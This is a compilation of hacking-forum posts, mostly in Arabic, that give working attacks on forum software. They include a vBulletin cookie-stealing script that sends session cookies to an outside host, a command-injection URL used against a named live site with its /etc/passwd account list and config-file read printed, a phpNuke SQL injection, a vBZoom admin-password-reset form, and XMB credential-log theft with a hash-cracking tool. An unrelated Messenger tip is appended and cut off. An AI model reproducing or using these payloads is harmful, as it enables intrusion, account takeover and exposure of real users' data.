You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco

rd%2Ephp%3Fcook%3D%27
%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>
And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com.

With the recorded user id and password hash, we can access the site:
http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
-----------------------------------------------------------------------------------

منقول من موقع امركي
--------------------------------------------------------------------------------

يتبع.....................................
__________________________________________________ ____
اختراق جميع المنتديات......الجزء 3 والاخير
________________________________________

ثغرة في منتديات vbulletin 2.0.3

بسم الله الرحمن الرحيم

الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

vbulletin 2.0.3

طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

http://www.romulus2.com <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

و طبقنا الثغرة ظهر الشكل

http://www.romulus2.com/forum/calen...001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die( );echo"

و مكان <command> نحط الامر الي بدنا ياه

فاول شي قلنا خلينا نعرف مين نحنا فحطينا

whoami

و الي طلع

انا استبشرت خير على الاقل مني nobody

فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

cat /etc/passwd مكان <command>

و طلع

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2

aemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12

/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
gtd:x:501:100::/home/gtd:/bin/bash
majordomo:x:504:103::/home/majordomo:/bin/bash
quota25:*:505:1::/home/quota25:
quota50:*:506:1::/home/quota50:
quota75:*:507:1::/home/quota75:
quota100:*:508:1::/home/quota100:
quota150:*:509:1::/home/quota150:
quota300:*:510:1::/home/quota300:
quota2:*:511:1::/home/quota2:
quota5:*:512:1::/home/quota5:
quota10:*:513:1::/home/quota10:
msql:x:497:100::/home/msql:/bin/bash
userquota:x:503:100:quota:/home/userquota:/bin/bash
johnv:*:516:1::/home/johnv:
minerva:x:514:516::/home/minerva:/bin/bash
taosfineart:x:517:517::/home/taosfineart:/bin/bash
technoasylum:x:518:518::/home/technoasylum:/bin/bash
ward-tech:x:519:519::/home/ward-tech:/bin/bash
malio:x:522:522::/home/malio:/bin/bash
cindyland:x:529:529::/home/cindyland:/bin/bash
mathom-house:x:532:532::/home/mathom-house:/bin/bash
libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash
bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
surfclassic:x:550:549::/home/surfclassic:/bin/bash
thomason-development:x:552:551::/home/thomason-development:/bin/bash
james:x:553:534::/home/james:/bin/emailonly
alexr:x:554:534::/home/alexr:/bin/emailonly
god:x:555:522::/home/god:/bin/emailonly
sales:x:556:522::/home/sales:/bin/bash
info:x:557:522::/home/info:/bin/emailonly
ryugen:x:558:552::/home/ryugen:/bin/bash
allanart:x:566:559::/home/allanart:/bin/bash
womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
mbaentry:x:576:567::/home/mbaentry:/bin/bash
omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
talvee:x:582:549::/home/talvee:/bin/emailonly
mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
finchair:x:594:580::/home/finchair:/bin/bash
americanabatement:x:595:581::/home/americanabatement:/bin/bash
whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
ronemous:x:604:568::/home/ronemous:/bin/emailonly
parrotranch:x:605:588::/home/parrotranch:/bin/bash
erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
parduhn:x:610:593::/home/parduhn:/bin/bash
riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
kaialece:x:626:604::/home/kaialece:/bin/bash
zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
trevor:x:630:596::/home/trevor:/bin/emailonly
dino:x:631:522::/home/dino:/bin/emailonly
loconsigo:x:632:608::/home/loconsigo:/bin/bash
delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
michael:x:652:605::/home/michael:/bin/emailonly
jereme:x:654:596::/home/jereme:/bin/emailonly
windows-tips:x:655:624::/home/windows-tips:/bin/bash
ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
cprltd:x:663:629::/home/cprltd:/bin/bash
batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
housegroove:x:674:637::/home/housegroove:/bin/bash
washglass:x:675:638::/home/washglass:/bin/bash
djmattson:x:676:639::/home/djmattson:/bin/bash
statecapitols:x:677:640::/home/statecapitols:/bin/bash
kanjiweb:x:678:641::/home/kanjiweb:/bin/bash
freevg:x:681:644::/home/freevg:/bin/bash
writersresource:x:682:645::/home/writersresource:/bin/bash
evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
antioch:x:704:659::/home/antioch:/bin/bash
lifelinks:x:705:660::/home/lifelinks:/bin/bash
sinecos:x:707:662::/home/sinecos:/bin/bash
dosdonas:x:711:666::/home/dosdonas:/bin/bash
accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
jc:x:716:581::/home/jc:/bin/emailonly
jo:x:717:581::/home/jo:/bin/emailonly
infoaai:x:719:581::/home/infoaai:/bin/emailonly
gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
j-j-c:x:724:674::/home/j-j-c:/bin/bash
camp:x:726:660::/home/camp:/bin/emailonly
marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
gypsy:x:741:671::/home/gypsy:/bin/emailonly
meg:x:749:593::/home/meg:/bin/emailonly
huwe:x:751:679::/home/huwe:/bin/bash
ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
videoteacher:x:762:690::/home/videoteacher:/bin/bash
spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
nawaf:x:766:694::/home/nawaf:/bin/bash
ccdump:x:768:696::/home/ccdump:/bin/bash
drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
shellmandanceacademy:x:778:706::/home/shellmandanceacademy:/bin/bash
samelec:x:779:707::/home/samelec:/bin/bash
pet-odor:x:780:708::/home/pet-odor:/bin/bash
michael1:x:781:593::/home/michael1:/bin/emailonly
mmnursereview:x:785:710::/home/mmnursereview:/bin/bash
franksland:x:787:712::/home/franksland:/bin/bash
gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
francisengineering:x:808:720::/home/francisengineering:/bin/bash
befree2:x:814:726::/home/befree2:/bin/bash
barclay:x:821:689::/home/barclay:/bin/emailonly
airupdate:x:823:732::/home/airupdate:/bin/bash
stream:x:825:734::/home/stream:/bin/bash
strantech:x:826:735::/home/strantech:/bin/bash
newcityftp:x:832:740::/home/newcityftp:/bin/bash
nagomifan:x:833:741::/home/nagomifan:/bin/bash
gecko:x:834:671::/home/gecko:/bin/emailonly
chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
binarytech:x:839:746::/home/binarytech:/bin/bash
<<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>

ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته

romulus2:x:997:837::/home/romulus2:/bin/bash
اووووه حركات يوصل ل /bin/bash

االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع
صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان

فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس

من ملف الباسوود لاحظت انه الملف هو

/home/romulus2

و في طريقة تانية انك تكتب pwd

كتبت و طلع

/home2/www/romulus2/forum

اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

/admin/config.php

فصار الامر

cat /home2/www/romulus2/forum/admin/config.php
_________________
fares125@hotmail.com

__________________________________________________
__
-----------------------------------------------------------------------------------
ثغرة مجلة phpnuke

ثغرة مجلة phpnuke

http://www.example.com/modules.php?...iewforum&forum='%20OR%201=1%20INTO% 20OUTFILE%20'[/path]/vf.txt'/*

تضع بدلا منwww.example.com أسم الموقع الذي تريده

منقووول

____________________________________
اختراق منتديات vbzoom
------------------------------------------------
السلام عليكم
شباب انا اقدم لكم اهم ثغره معى الشرح المفصل
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form

<form name="f1" action="هنا تضع وصله الموقع " method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form
وبعد ان تحط وصل الموقع
تسويه في صفحه html
وتكتب اسم الادمين والباسورد الجديده وايميل جديد
تحياتي
_________________

ثغرة في منتديات من نوع XMB
--------------------------------------------------------
بسم الله الرحمن الرحيم
طريقة الاختراق :

ثغرة جديدة في منتديات من نوع XMB

الشرح والتطبيق

1- عليك بالذهاب الى موقع جوجل http://www.google.com
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
http://www.******.com/massegboard/index_log.log
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك مثلا:
xmbuser=admin
والباسورد راح تلقاه قدامه زي كذه
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
ftp://www.cafecounterintelligence.com/cci/chigger.exe

افتح البرنامج وفي :

رقم (1) قم بوضع علامة صح.
رقم (2) قم بوضع اسم العضو سواء مدير او غيره
رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره
رقم (4) قم بوضع علامة صح.
رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
رقم (6) قم بوضع المنفذ حق البروكسي

10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير تبع المنتدى
وسوي الي بدك ياه

الاجزاء الثلاثه منقوله

خلى الماسنجر يتكلم بصوتك انتا
________________________________________

لو عايز الماسنجر يقول لك انه جاك ايميل بصوتك
وتقدر تحط اي شي اغنيه او اي شي انت تبيه
اذا تبي الماسنجر يقول لك انه جاك ايميل بصوتك انت
بدلاً من خروج نافذة أمامه عـلى سطح المكتب عـلماً أن
هذه الحركة عـملـت معي في مسنجر الهوتمل msn وبحركة
غـريبة جـداً وعـملها بسيط وهــو كالتالـي : ـ

- سجل صوتك بملف خاص وخلي اسمه newemail مع العلم أنه يشترط ان يكون
الملف على هيئة
wav وقم بتخزينه داخل الملف الموجود في المسنجر

طبعا انت عندما تحزن الملف الذي قمت بنشاءه وضعه في المجلد الخاص في
الماسنجر ستجد ان
هناك ملف